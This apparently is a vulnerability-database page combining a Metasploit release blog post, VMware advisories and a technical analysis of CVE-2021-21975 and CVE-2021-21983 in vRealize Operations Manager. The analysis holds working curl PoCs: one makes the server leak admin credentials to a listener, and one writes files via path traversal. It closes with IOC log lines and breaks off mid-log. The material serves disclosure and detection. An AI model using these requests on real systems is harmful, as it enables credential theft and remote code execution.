DATABASE RESOURCES PRICING ABOUT US

{"id": "RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF", "type": "rapid7blog", "bulletinFamily": "info", "title": "Metasploit Wrap-Up", "description": "## Operations shell\n\n\n\nOperations and management software make popular targets due to their users typically having elevated privileges across a network. Our own [wvu](<https://github.com/wvu-r7>) contributed the [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) exploit module for the vulnerabilities discovered by security researcher Egor Dimitrenko. The `exploit/linux/http/vmware_vrops_mgr_ssrf_rce` module achieves remote code execution (RCE) as the `admin` Unix user by chaining the two vulnerabilities. First, [CVE-2021-21975](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975?referrer=blog#rapid7-analysis>) pre-authentication server-side request forgery (SSRF) vulnerability is exploited in the `/casa/nodes/thumbprints` endpoint to obtain the admin credentials. Then, the credentials are used to authenticate to the vRealize Operations Manager API and exploit [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) via the `/casa/private/config/slice/ha/certificate` endpoint. This allows the module to write and execute an arbitrary file, a JSP payload in this case. The module should work against the following vulnerable versions:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n\n## Data rules everything around me\n\nMany dynamic websites and business applications have associated databases, therefore databases are commonplace on networks. Odds are you frequently encounter more than one database on an engagement. The release this week includes two new database related modules!\n\nThe first, an [Apache Druid RCE](<https://github.com/rapid7/metasploit-framework/pull/14977>) exploit module for a vulnerability in versions 0.20.0 and older. The vulnerability [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>) was discovered by Litch1, and [je5442804](<https://github.com/je5442804>) contributed the module. The second, a gather module named [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) contributed by [Geoff Rainville (noncenz)](<https://github.com/noncenz>) enables easy looting of any key-value stores you discover.\n\n## New Module Content (5)\n\n * [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) by Geoff Rainville noncenz - Adds a module to retrieve all data from a Redis instance (version 2.8.0 and above).\n * [Apache Druid 0.20.0 Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/14977>) by Litch1, Security Team of Alibaba Cloud and je5442804, which exploits [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>) \\- This adds an exploit module that targets Apache Druid versions prior to `0.20.1`. An authenticated user can send a single request that both enables the execution of user-provided JavaScript code and executes the code on the server with the privileges of the user running the Apache Druid process. By default, Apache Druid does not require authentication.\n * [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) by wvu and Egor Dimitrenko, which exploits [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) \\- This adds a module that exploits both a pre-auth SSRF and a post-auth file write via directory traversal to get code execution as the `admin` user on vulnerable VMware vRealize Operations Manager installs.\n * [Micro Focus Operations Bridge Reporter shrboadmin default password](<https://github.com/rapid7/metasploit-framework/pull/15086>) by Pedro Ribeiro, which exploits ZDI-20-1215 - This adds an exploit for [CVE-2020-11857](<https://attackerkb.com/topics/0rBqrv2UNX/cve-2020-11857?referrer=blog>) which is a hardcoded SSH password in Micro Focus Operations Bridge Manager instances.\n * [KOFFEE - Kia OFFensivE Exploit](<https://github.com/rapid7/metasploit-framework/pull/15021>) by Gianpiero Costantino and Ilaria Matteucci, which exploits [CVE-2020-8539](<https://attackerkb.com/topics/zXxJ29z090/cve-2020-8539?referrer=blog>) \\- This adds a post module that leverages the CVE-2020-8539 vulnerability on certain Kia Motors head units. This vulnerability is also known as KOFFEE.\n\n## Enhancements and features\n\n * [#11257](<https://github.com/rapid7/metasploit-framework/pull/11257>) from [sempervictus](<https://github.com/sempervictus>) \\- This PR adds the ability to wrap some powershell used for exploitation purposes with RC4 for obfuscation.\n * [#15014](<https://github.com/rapid7/metasploit-framework/pull/15014>) from [ctravis-r7](<https://github.com/ctravis-r7>) \\- Adds the ability to specify an individual private key as a string parameter into the `auxiliary/scanner/ssh/ssh_login_pubkey` module.\n * [#15110](<https://github.com/rapid7/metasploit-framework/pull/15110>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds the necessary functionality to the Java Meterpreter to resolve hostnames over DNS, closing a feature gap that had been present with other Meterpreters.\n\n## Bugs Fixed\n\n * [#14953](<https://github.com/rapid7/metasploit-framework/pull/14953>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fix the python 3.6 string formatting syntax in modules/auxiliary/scanner/http/rdp_web_login\n * [#15050](<https://github.com/rapid7/metasploit-framework/pull/15050>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Fixes a crash in Metasploit's console when the user tried to tab complete values such as file paths that were missing their final ending quote\n * [#15081](<https://github.com/rapid7/metasploit-framework/pull/15081>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Updates the Microsoft SQL Server interesting data finder module to correctly handle the scenario where no interesting data is found. Previously this would result in a module crash.\n * [#15094](<https://github.com/rapid7/metasploit-framework/pull/15094>) from [timwr](<https://github.com/timwr>) \\- This fixed a bug in how certain Meterpreter's would execute command issued through `sessions -c` where some would use a subshell while others would not.\n * [#15114](<https://github.com/rapid7/metasploit-framework/pull/15114>) from [smashery](<https://github.com/smashery>) \\- Updates the `auxiliary/scanner/redis/file_upload` module to correctly handle Redis instances that require authenticated access\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-22T13%3A32%3A25%2B10%3A00..2021-04-29T10%3A54%3A48-05%3A00%22>)\n * [Full diff 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/compare/6.0.41...6.0.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "published": "2021-04-30T17:42:19", "modified": "2021-04-30T17:42:19", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "https://blog.rapid7.com/2021/04/30/metasploit-wrap-up-109/", "reporter": "Matthew Kienow", "references": [], "cvelist": ["CVE-2020-11857", "CVE-2020-8539", "CVE-2021-21975", "CVE-2021-21983", "CVE-2021-25646"], "immutableFields": [], "lastseen": "2021-04-30T18:51:30", "viewCount": 68, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0E681F53-D1E0-4F8C-8799-7801D5905A7D", "AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0069", "CPAI-2021-0234", "CPAI-2021-1066", "CPAI-2022-0230"]}, {"type": "cisa", "idList": ["CISA:D7385BDD2786721598A2135E182282C2"]}, {"type": "cve", "idList": ["CVE-2020-11857", "CVE-2020-8539", "CVE-2021-21975", "CVE-2021-21983", "CVE-2021-25646"]}, {"type": "github", "idList": ["GHSA-WRQF-RRRW-W3MG"]}, {"type": "githubexploit", "idList": ["05540576-A7EF-54DF-906F-E2D55408AD36", "1E8AE40F-314C-5935-B6FB-4F9B8A73A0E4", "2427E2EE-38C6-5204-B121-594782A77A97", "29AADC8A-DEC3-59E3-BF20-A227E39A5083", "33268543-6217-5EB6-9E15-3AD5A03E3B8E", "35114B1B-006F-5732-8E42-9E8643B61C2A", "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "5742BA27-07D1-52F4-BB97-BE458480BFFA", "7663BC50-C08E-5741-B771-BE50606E7B78", "7A372D54-3708-5032-B00A-2B54C2137FB7", "911A7F63-1DBC-54A3-820C-F8F19E006338", "AB767826-96D0-59A5-8589-55AACA694FBA", "BFE57812-E8DA-5B2F-9C64-DC10E559D926", "C598A802-888D-5C28-A03B-FB6C86310037", "D5702470-2A4B-5116-9B9F-4001BDD6935C"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-HTTP-APACHE_DRUID_JS_RCE-", "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VROPS_MGR_SSRF_RCE-", "MSF:POST-ANDROID-LOCAL-KOFFEE-"]}, {"type": "nessus", "idList": ["APACHE_DRUID_CVE-2021-25646.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL"]}, {"type": "osv", "idList": ["OSV:GHSA-WRQF-RRRW-W3MG"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162345", "PACKETSTORM:162349", "PACKETSTORM:162407"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-25646"]}, {"type": "seebug", "idList": ["SSV:99173", "SSV:99174"]}, {"type": "thn", "idList": ["THN:4640BEB83FE3611B6867B05878F52F0D"]}, {"type": "veracode", "idList": ["VERACODE:29287"]}, {"type": "vmware", "idList": ["VMSA-2021-0004.1", "VMSA-2021-0004.2"]}, {"type": "zdi", "idList": ["ZDI-20-1215"]}, {"type": "zdt", "idList": ["1337DAY-ID-36159", "1337DAY-ID-36160", "1337DAY-ID-36169"]}]}, "score": {"value": 1.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:0E681F53-D1E0-4F8C-8799-7801D5905A7D", "AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0069", "CPAI-2021-0234"]}, {"type": "cisa", "idList": ["CISA:D7385BDD2786721598A2135E182282C2"]}, {"type": "cve", "idList": ["CVE-2020-11857", "CVE-2021-21975", "CVE-2021-21983"]}, {"type": "github", "idList": ["GHSA-WRQF-RRRW-W3MG"]}, {"type": "githubexploit", "idList": ["05540576-A7EF-54DF-906F-E2D55408AD36", "1E8AE40F-314C-5935-B6FB-4F9B8A73A0E4", "29AADC8A-DEC3-59E3-BF20-A227E39A5083", "35114B1B-006F-5732-8E42-9E8643B61C2A", "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "5742BA27-07D1-52F4-BB97-BE458480BFFA", "7663BC50-C08E-5741-B771-BE50606E7B78", "7A372D54-3708-5032-B00A-2B54C2137FB7", "911A7F63-1DBC-54A3-820C-F8F19E006338", "AB767826-96D0-59A5-8589-55AACA694FBA", "BFE57812-E8DA-5B2F-9C64-DC10E559D926", "C1E789A0-6183-52F1-A86B-62DC360B649D", "C598A802-888D-5C28-A03B-FB6C86310037", "D5702470-2A4B-5116-9B9F-4001BDD6935C"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/VMWARE_VROPS_MGR_SSRF_RCE/", "MSF:POST/ANDROID/LOCAL/KOFFEE/"]}, {"type": "nessus", "idList": ["APACHE_DRUID_CVE-2021-25646.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162345", "PACKETSTORM:162349", "PACKETSTORM:162407"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-25646"]}, {"type": "seebug", "idList": ["SSV:99173", "SSV:99174"]}, {"type": "thn", "idList": ["THN:4640BEB83FE3611B6867B05878F52F0D"]}, {"type": "zdi", "idList": ["ZDI-20-1215"]}, {"type": "zdt", "idList": ["1337DAY-ID-36159", "1337DAY-ID-36160", "1337DAY-ID-36169"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2020-11857", "epss": "0.012990000", "percentile": "0.837540000", "modified": "2023-03-16"}, {"cve": "CVE-2020-8539", "epss": "0.000920000", "percentile": "0.377010000", "modified": "2023-03-16"}, {"cve": "CVE-2021-21975", "epss": "0.974910000", "percentile": "0.999460000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21983", "epss": "0.002480000", "percentile": "0.609250000", "modified": "2023-03-17"}, {"cve": "CVE-2021-25646", "epss": "0.974640000", "percentile": "0.999160000", "modified": "2023-03-17"}], "vulnersScore": 1.3}, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1659918026, "epss": 1679070268}, "_internal": {"score_hash": "2dda59d4f2579c625159c2eebdd359fb"}}

{"vmware": [{"lastseen": "2021-09-03T02:07:16", "description": "##### **1\\. Impacted Products**\n\n * VMware vRealize Operations \n\n * VMware Cloud Foundation \n\n * vRealize Suite Lifecycle Manager \n\n\n##### **2\\. Introduction**\n\nMultiple vulnerabilities in VMware vRealize Operations were privately reported to VMware. Patches and Workarounds are available to address these vulnerabilities in impacted VMware products. \n\n\n##### **3a. Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975)**\n\n**Description**\n\nThe vRealize Operations Manager API contains a Server Side Request Forgery. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of [8.6](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N>). \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21975 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to impacted deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21975 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nA FAQ was created which is listed in the 'Additional Documentation' column of the 'Response Matrix' below.\n\n**Acknowledgements**\n\nVMware would like to thank Egor Dimitrenko of Positive Technologies for reporting this vulnerability to us. \n\n\n##### **3b. Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983)**\n\n**Description**\n\nThe vRealize Operations Manager API contains an arbitrary file write vulnerability. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of [7.2](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>). \n\n\n**Known Attack Vectors**\n\nAn authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21983 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21983 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nA FAQ was created which is listed in the 'Additional Documentation' column of the 'Response Matrix' below. \n\n\n**Acknowledgements**\n\nVMware would like to thank Egor Dimitrenko of Positive Technologies for reporting this vulnerability to us. \n\n\n**Notes**\n\n[1] The hotfixes previously mentioned in this advisory were found to only have partially resolved CVE-2021-21975 leaving a residual risk of moderate severity (CVSS = 4.3). Hotfixes created to resolve the vulnerabilities documented in [VMSA-2021-0018](<https://www.vmware.com/security/advisories/VMSA-2021-0018.html>) also include complete fixes for CVE-2021-21975. \n \n[2] vRealize Operations Manager 8.4.0 shipped with the aforementioned incomplete fixes, and is therefore partially impacted by CVE-2021-21975.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-03-30T00:00:00", "type": "vmware", "title": "VMware vRealize Operations updates address Server Side Request Forgery and Arbitrary File Write vulnerabilities (CVE-2021-21975, CVE-2021-21983)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "VMSA-2021-0004.1", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0004.1.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2022-11-02T11:54:13", "description": "3a. Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) \n\nThe vRealize Operations Manager API contains a Server Side Request Forgery. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of 8.6. \n\n3b. Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) \n\nThe vRealize Operations Manager API contains an arbitrary file write vulnerability. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of 7.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-30T00:00:00", "type": "vmware", "title": "VMware vRealize Operations updates address Server Side Request Forgery and Arbitrary File Write vulnerabilities (CVE-2021-21975, CVE-2021-21983)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-08-24T00:00:00", "id": "VMSA-2021-0004.2", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0004.2.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "seebug": [{"lastseen": "2021-07-24T15:55:32", "description": "# Description\n\nOn March 30, 2021, VMware published a [security advisory](https://www.vmware.com/security/advisories/VMSA-2021-0004.html) for [CVE-2021-21975](https://nvd.nist.gov/vuln/detail/CVE-2021-21975) and [CVE-2021-21983](https://nvd.nist.gov/vuln/detail/CVE-2021-21983), two chainable vulnerabilities in its vRealize Operations Manager product. CVE-2021-21975 is an unauthenticated server-side request forgery (SSRF), while CVE-2021-21983 is an authenticated arbitrary file write. Successfully chaining both vulnerabilities achieves unauthenticated remote code execution (RCE) in vRealize Operations Manager and any product using it as a component.\n\nAt the time of public disclosure, Positive Technologies [tweeted](https://twitter.com/ptswarm/status/1376961747232382976) about CVE-2021-21975 and CVE-2021-21983, which were both discovered by their researcher [Egor Dimitrenko](https://twitter.com/elk0kc).\n\n# Affected products\n\n- vRealize Operations Manager\n - 7.0.0\n - 7.5.0\n - 8.0.0, 8.0.1\n - 8.1.0, 8.1.1\n - 8.2.0\n - 8.3.0\n- VMware Cloud Foundation (vROps)\n - 3.x\n - 4.x\n- vRealize Suite Lifecycle Manager (vROps)\n - 8.x\n\n# Technical analysis\n\nCVE-2021-21975 is the primary focus of this analysis.\n\n## CVE-2021-21975 (SSRF)\n\n`/nodes/thumbprints` (mapped to `/casa/nodes/thumbprints`) is an unauthenticated endpoint.\n\n```\n <sec:http pattern=\"/nodes/thumbprints\" security='none'/>\n```\n\nIt accepts a `POST` request whose body is a JSON array of network address strings.\n\n```\n @RequestMapping(value = {\"/nodes/thumbprints\"}, method = {RequestMethod.POST})\n @ResponseStatus(HttpStatus.OK)\n public ArrayList<ThumbprintResource> getNodesThumbprints(@RequestBody String[] addresses) {\n return this.clusterDefService.getNodesThumbprints(new HashSet(Arrays.asList((Object[])addresses)));\n }\n```\n\nEach address is sent a crafted `GET` request, leading to a partially controlled SSRF.\n\n```\n public ArrayList<ThumbprintResource> getNodesThumbprints(Set<String> addresses) {\n ArrayList<ThumbprintResource> ipToThumbprint = new ArrayList<>();\n if (null == addresses) {\n return ipToThumbprint;\n }\n configureInsecurRestTemplate();\n\n HttpMapFunction f = new HttpMapFunction(addresses.<String>toArray(new String[addresses.size()]), RequestMethod.GET, \"/node/thumbprint\", null, null, this.webappInfo, this.timeoutForGetRequest, this.restTemplate);\n\n\n\n\n\n\n\n\n HttpMapResponse[] responses = f.execute();\n\n for (HttpMapResponse resp : responses) {\n if (resp.getHttpCode() == HttpStatus.OK.value()) {\n String data = resp.getDocument().replace('\"', ' ').trim();\n ipToThumbprint.add(new ThumbprintResource(resp.getSliceAddress(), data));\n } else {\n ipToThumbprint.add(new ThumbprintResource(resp.getSliceAddress(), null));\n }\n }\n\n return ipToThumbprint;\n }\n```\n\n### PoC\n\nThe [provided workaround](https://kb.vmware.com/s/article/83210) provided enough information to develop a PoC.\n\n```\nwvu@kharak:~$ curl -k https://192.168.123.185/casa/nodes/thumbprints -H \"Content-Type: application/json\" -d '[\"192.168.123.1:8443/#\"]'\n```\n\nAppending `#` (presumably [URI fragment syntax](https://en.wikipedia.org/wiki/URI_fragment)) to the SSRF URI allows for full control of the `GET` request path.\n\n```\nwvu@kharak:~$ ncat -lkv --ssl 8443\nNcat: Version 7.91 ( https://nmap.org/ncat )\nNcat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.\nNcat: SHA-1 fingerprint: DD68 63E6 C329 1851 F74F 797A F684 7823 207A 55E7\nNcat: Listening on :::8443\nNcat: Listening on 0.0.0.0:8443\nNcat: Connection from 192.168.123.185.\nNcat: Connection from 192.168.123.185:36070.\nGET / HTTP/1.1\nAccept: application/xml, application/json\nContent-Type: application/json\nAccept-Charset: big5, big5-hkscs, cesu-8, euc-jp, euc-kr, gb18030, gb2312, gbk, ibm-thai, ibm00858, ibm01140, ibm01141, ibm01142, ibm01143, ibm01144, ibm01145, ibm01146, ibm01147, ibm01148, ibm01149, ibm037, ibm1026, ibm1047, ibm273, ibm277, ibm278, ibm280, ibm284, ibm285, ibm290, ibm297, ibm420, ibm424, ibm437, ibm500, ibm775, ibm850, ibm852, ibm855, ibm857, ibm860, ibm861, ibm862, ibm863, ibm864, ibm865, ibm866, ibm868, ibm869, ibm870, ibm871, ibm918, iso-2022-cn, iso-2022-jp, iso-2022-jp-2, iso-2022-kr, iso-8859-1, iso-8859-13, iso-8859-15, iso-8859-2, iso-8859-3, iso-8859-4, iso-8859-5, iso-8859-6, iso-8859-7, iso-8859-8, iso-8859-9, jis_x0201, jis_x0212-1990, koi8-r, koi8-u, shift_jis, tis-620, us-ascii, utf-16, utf-16be, utf-16le, utf-32, utf-32be, utf-32le, utf-8, windows-1250, windows-1251, windows-1252, windows-1253, windows-1254, windows-1255, windows-1256, windows-1257, windows-1258, windows-31j, x-big5-hkscs-2001, x-big5-solaris, x-compound_text, x-euc-jp-linux, x-euc-tw, x-eucjp-open, x-ibm1006, x-ibm1025, x-ibm1046, x-ibm1097, x-ibm1098, x-ibm1112, x-ibm1122, x-ibm1123, x-ibm1124, x-ibm1166, x-ibm1364, x-ibm1381, x-ibm1383, x-ibm300, x-ibm33722, x-ibm737, x-ibm833, x-ibm834, x-ibm856, x-ibm874, x-ibm875, x-ibm921, x-ibm922, x-ibm930, x-ibm933, x-ibm935, x-ibm937, x-ibm939, x-ibm942, x-ibm942c, x-ibm943, x-ibm943c, x-ibm948, x-ibm949, x-ibm949c, x-ibm950, x-ibm964, x-ibm970, x-iscii91, x-iso-2022-cn-cns, x-iso-2022-cn-gb, x-iso-8859-11, x-jis0208, x-jisautodetect, x-johab, x-macarabic, x-maccentraleurope, x-maccroatian, x-maccyrillic, x-macdingbat, x-macgreek, x-machebrew, x-maciceland, x-macroman, x-macromania, x-macsymbol, x-macthai, x-macturkish, x-macukraine, x-ms932_0213, x-ms950-hkscs, x-ms950-hkscs-xp, x-mswin-936, x-pck, x-sjis_0213, x-utf-16le-bom, x-utf-32be-bom, x-utf-32le-bom, x-windows-50220, x-windows-50221, x-windows-874, x-windows-949, x-windows-950, x-windows-iso2022jp\nX-VSCM-Request-Id: ak00003Y\nAuthorization: Basic bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=\nCache-Control: no-cache\nPragma: no-cache\nUser-Agent: Java/1.8.0_212\nHost: 192.168.123.1:8443\nConnection: keep-alive\n```\n\nNote the `Authorization: Basic` header, which is present in older vulnerable versions but missing from 8.3.0. The Base64 `bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=` decodes to the credentials `maintenanceAdmin:RfdsxK/5M4MSk2si174KIhDV`.\n\n## CVE-2021-21983 (file write)\n\nCVE-2021-21983 is a path traversal in the `/casa/private/config/slice/ha/certificate` endpoint.\n\n```\n @RequestMapping(value = {\"/private/config/slice/ha/certificate\"}, method = {RequestMethod.POST})\n @ResponseBody\n @ResponseStatus(HttpStatus.OK)\n @Auditable(category = Auditable.Category.CONFIG_SLICE_CERTIFICATE, auditMessage = \"Accepting replicated certificate from Master slice\")\n public void handleCertificateUpload(@RequestParam(\"name\") String name, @RequestParam(\"file\") MultipartFile multiPartFile) {\n try {\n this.certificateService.handleCertificateFile(multiPartFile, name);\n } catch (Exception e) {\n this.log.error(\"Error handling replica certificate upload: {}\", e);\n throw new CasaException(e, \"Failed to upload replica certificate\");\n }\n }\n void handleCertificateFile(MultipartFile multiPartFile, String fileName) {\n+ if (fileName == null || !fileName.equals(\"cakey.pem\")) {\n+ throw new CasaException(\"Wrong cert file name is provided\");\n+ }\n File certFile = new File(this.certDirPath, fileName);\n\n try {\n multiPartFile.transferTo(certFile);\n\n certFile.setExecutable(false, false);\n } catch (Exception e) {\n throw new CasaException(\"Error writing Certificate file: \" + certFile.getAbsolutePath(), e);\n }\n }\n```\n\n### PoC\n\n```\nwvu@kharak:~$ curl -kH \"Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=\" https://192.168.123.185/casa/private/config/slice/ha/certificate -F name=../../../../../tmp/vulnerable -F \"file=@-; filename=vulnerable\" <<<vulnerable\nwvu@kharak:~$\nroot@vRealizeClusterNode [ /tmp ]# ls -l vulnerable\n-rw-r--r-- 1 admin admin 11 Apr 5 22:18 vulnerable\nroot@vRealizeClusterNode [ /tmp ]# cat vulnerable\nvulnerable\nroot@vRealizeClusterNode [ /tmp ]#\n```\n\n## IOCs\n\nNumerous log files can be found in `/usr/lib/vmware-casa/casa-webapp/logs`. The file `/usr/lib/vmware-casa/casa-webapp/logs/casa.log` is of particular interest for tracking suspicious requests.\n\n```\n2021-04-03 07:58:33,113 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:60 - Request POST /casa/nodes/thumbprints from 192.168.123.1: New request id ak0000BL\n2021-04-03 07:58:33,113 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.HttpMapFunction:325 - execute, hosts=[192.168.123.1:8443/#], op=GET, relativeUrl=/node/thumbprint, doc={}\n2021-04-03 07:58:33,116 [ak0000BL] [pool-36-thread-1] INFO casa.support.HttpTask:128 - Making HTTP call to url=https://192.168.123.1:8443/#/casa/node/thumbprint\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - HTTP GET https://192.168.123.1:8443/#/casa/node/thumbprint\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - Accept=[text/plain, application/json, application/*+json, */*]\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - Writing [{}] as \"application/json\"\n2021-04-03 07:58:33,118 [ak0000BL] [pool-36-thread-1] INFO casa.support.MaintenanceUserUtils:33 - Maintenance User credentials initialized\n2021-04-03 07:58:43,114 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] WARN casa.support.HttpMapFunction:414 - Error retrieving HttpTask future: java.util.concurrent.CancellationException\n2021-04-03 07:58:43,116 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:93 - Request POST /casa/nodes/thumbprints: Done\n2021-04-05 22:18:22,066 [ ] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.security.UsernamePasswordAuthenticator:104 - Authenticated maintenance user 'maintenanceAdmin'\n2021-04-05 22:18:22,066 [ak0002Q9] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:60 - Request POST /casa/private/config/slice/ha/certificate from 192.168.123.1: New request id ak0002Q9\n2021-04-05 22:18:22,067 [ak0002Q9] 